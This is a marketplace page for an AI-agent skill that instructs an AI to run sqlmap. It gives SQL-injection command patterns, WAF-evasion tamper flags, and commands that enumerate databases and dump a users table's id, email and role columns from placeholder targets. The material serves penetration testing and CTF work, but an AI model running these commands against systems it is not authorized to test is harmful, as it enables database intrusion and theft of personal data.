Strix•sqlmap Usage
SkillDev toolsStrix sqlmap command manual covering target syntax, non-interactive execution, and common enumeration workflows; trigger name: strix-sqlmap
Available today. Use it from your connected AI after setup.
No other account needed.
Connect ahel once, and every AI you use reads what you have installed.
Then ask your AI: use the Strix•sqlmap Usage skill
What this skill tells your AI
The instructions your AI receives, as published by asdfgh1445/ctf-super-hub in strix-sqlmap/SKILL.md and read by ahel’s review.
Official docs:
Canonical syntax:
sqlmap -u "<target_url_with_params>" [options]
High-signal flags:
-u, --url <url>target URL-r <request_file>raw HTTP request input-p <param>test specific parameter(s)--batchnon-interactive mode--level <1-5>test depth--risk <1-3>payload risk profile--threads <n>concurrency--technique <letters>technique selection--formsparse and test forms from target page--cookie <cookie>and--headers <headers>authenticated context--timeout <seconds>and--retries <n>transport stability--tamper <scripts>WAF/input-filter evasion--random-agentrandomize user-agent--ignore-proxybypass configured proxy--dbs,-D <db> --tables,-D <db> -T <table> --columns,-D <db> -T <table> -C <cols> --dump--flush-sessionclear cached scan state
Agent-safe baseline for automation:
sqlmap -u "https://target.tld/item?id=1" -p id --batch --level 2 --risk 1 --threads 5 --timeout 10 --retries 1 --random-agent
Common patterns:
- Baseline injection check:
sqlmap -u "https://target.tld/item?id=1" -p id --batch --level 2 --risk 1 --threads 5 - POST parameter testing:
sqlmap -u "https://target.tld/login" --data "user=admin&pass=test" -p pass --batch --level 2 --risk 1 - Form-driven testing:
sqlmap -u "https://target.tld/login" --forms --batch --level 2 --risk 1 --random-agent - Enumerate DBs:
sqlmap -u "https://target.tld/item?id=1" -p id --batch --dbs - Enumerate tables in DB:
sqlmap -u "https://target.tld/item?id=1" -p id --batch -D appdb --tables - Dump selected columns:
sqlmap -u "https://target.tld/item?id=1" -p id --batch -D appdb -T users -C id,email,role --dump
Critical correctness rules:
- Always include
--batchin automation to avoid interactive prompts. - Keep target parameter explicit with
-pwhen possible. - Use
--flush-sessionwhen retesting after request/profile changes. - Start conservative (
--level 1-2,--risk 1) and escalate only when needed.
Usage rules:
- Keep authenticated context (
--cookie/--headers) aligned with manual validation state. - Prefer narrow extraction (
-D/-T/-C) over broad dump-first behavior. - Do not use
-h/--helpduring normal execution unless absolutely necessary.
Failure recovery:
- If results conflict with manual testing, rerun with
--flush-session. - If blocked by filtering/WAF, reduce
--threadsand test targeted--tamperchains. - If initial detection misses likely injection, increment
--level/--riskgradually.
If uncertain, query web_search with:
site:github.com/sqlmapproject/sqlmap/wiki/usage sqlmap <flag>
Signals
- GitHub stars
- 808
- Forks
- 100
- Last commit
- Apr 2026
Advanced
- Catalog kind
- skill
- Gateway key
strix-sqlmap- Source
- github.com/asdfgh1445/ctf-super-hub